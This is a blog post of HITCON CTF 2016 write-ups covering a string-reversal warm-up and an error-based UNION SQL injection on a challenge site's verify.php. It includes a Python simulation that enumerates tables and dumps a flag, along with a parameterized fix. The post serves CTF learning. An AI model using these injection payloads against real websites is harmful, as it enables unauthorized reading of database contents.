
HITCON CTF 2016 Write-ups

October 10, 2016 | Posted in How to

HITCON CTF 2016 - Oct 8 10:00 AM ~ Oct 10 10:00 AM (GMT+8)



Welcome - Reverse (50)


Description
}FTC NOCTIH ot emocleW{noctih

Hint
None


Quick answer: the description is the flag written backwards, so reverse the string:

$ python
>>> "}FTC NOCTIH ot emocleW{noctih"[::-1]
'hitcon{Welcome to HITCON CTF}'
>>>


hitcon{Welcome to HITCON CTF} is the flag




Are you rich? - Web (50)


Question: Are You Rich?
Open http://52.197.184.164/are_you_rich/ and navigate to verify.php

Do some standard SQL injection testing on the Address field of verify.php. The page looks the submitted address up with a SQL query and passes the result to a remote API, which rejects anything that is not a valid address and echoes the rejected value in its error message. That echo is the leak: a UNION SELECT appended to the address makes the "looked-up" value whatever the database returns for our query. Asking for a table name (the 'COLUMNS' below is an information_schema table, so the injected query reads table_name from information_schema.tables with a LIMIT of one row) gives:

Error!: Remote API server reject your invalid address 'COLUMNS'. If your address is valid, please PM @cebrusfs or other admin on IRC.

Change the LIMIT offset to output a different table_name, and keep enumerating until the table named flag1 shows up:

Error!: Remote API server reject your invalid address 'flag1'. If your address is valid, please PM @cebrusfs or other admin on IRC.

Let's get the flag! Select it from flag1 the same way; the remote API rejects it too, and prints it:

Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.

hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!} is the flag.
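The enumerate-through-the-error-message technique above, as an added, self-contained example that is not part of the original write-up or of the challenge's code. It simulates the vulnerable verify.php with an in-memory SQLite database: the table list is read from sqlite_master instead of MySQL's information_schema.tables, the remote address validator is a stand-in function (remote_api_check) that rejects and echoes anything not shaped like an address, and the addresses, table contents and flag are made-up values. It also shows the parameterized version of the same lookup, against which the UNION payloads return nothing.

```python
import re
import sqlite3

# Constructed demo data: a made-up wallet table and a made-up flag table,
# standing in for the challenge's real database (values are not the real ones).
DEMO_ADDRESS = "1ExampleDemoAddressAAAAAAAAAAAAAA"
DEMO_FLAG = "hitcon{demo_flag_not_the_real_one}"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (address TEXT, balance INTEGER);
        CREATE TABLE flag1 (flag TEXT);
    """)
    conn.execute("INSERT INTO users VALUES (?, ?)", (DEMO_ADDRESS, 0))
    conn.execute("INSERT INTO flag1 VALUES (?)", (DEMO_FLAG,))
    return conn


class RejectedAddress(Exception):
    """Raised where the challenge printed its 'Remote API server reject ...' error."""


def remote_api_check(value):
    """Assumed stand-in for the remote validator: anything that does not look
    like an address is rejected, and the rejected value is echoed verbatim."""
    if value.startswith("1") and value.isalnum() and len(value) >= 26:
        return True
    raise RejectedAddress(
        "Error!: Remote API server reject your invalid address '%s'. "
        "If your address is valid, please PM an admin." % value)


def verify_vulnerable(conn, address):
    # Vulnerable: the submitted address is concatenated into the query, so a
    # UNION can make the "looked-up" value anything in the database.
    sql = "SELECT address FROM users WHERE address = '%s'" % address
    row = conn.execute(sql).fetchone()
    if row is None:
        raise RejectedAddress("Address not found")
    remote_api_check(row[0])        # echoes whatever the query selected
    return row[0]


def verify_safe(conn, address):
    # Fixed: parameter binding keeps the input as data, so no UNION ever runs.
    row = conn.execute("SELECT address FROM users WHERE address = ?",
                       (address,)).fetchone()
    if row is None:
        raise RejectedAddress("Address not found")
    remote_api_check(row[0])
    return row[0]


def leak(conn, select_tail, verify=verify_vulnerable):
    """Inject "' UNION ALL SELECT <select_tail> -- " as the address and return
    the value the error echoes back, or None if nothing was echoed."""
    payload = "' UNION ALL SELECT %s -- " % select_tail
    try:
        verify(conn, payload)
    except RejectedAddress as exc:
        m = re.search(r"invalid address '(.*)'\. If", str(exc))
        return m.group(1) if m else None
    return None


def enumerate_tables(conn, verify=verify_vulnerable):
    """Walk the table list one row at a time with LIMIT 1 OFFSET n, as the
    write-up did against information_schema.tables (sqlite_master here)."""
    tables = []
    offset = 0
    while True:
        name = leak(conn, "name FROM sqlite_master WHERE type='table' "
                          "LIMIT 1 OFFSET %d" % offset, verify)
        if name is None:
            return tables
        tables.append(name)
        offset += 1


def dump_flag(conn, verify=verify_vulnerable):
    # Same trick, now selecting the flag column out of the table found above.
    return leak(conn, "flag FROM flag1", verify)


if __name__ == "__main__":
    db = build_db()
    print("tables:", enumerate_tables(db))
    print("flag:", dump_flag(db))
    print("fixed version leaks:", dump_flag(db, verify_safe))
```

The enumeration loop stops when an offset past the last table returns no row, which the vulnerable page reports without an echoed value; against verify_safe the same payloads are treated as a literal (non-existent) address and nothing is leaked.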

Another way, by nacayoshi00: use the injection to buy Flag1.

That's it.




To be continued...


Tagged in: Conference, hitcon, taiwan, write, writeups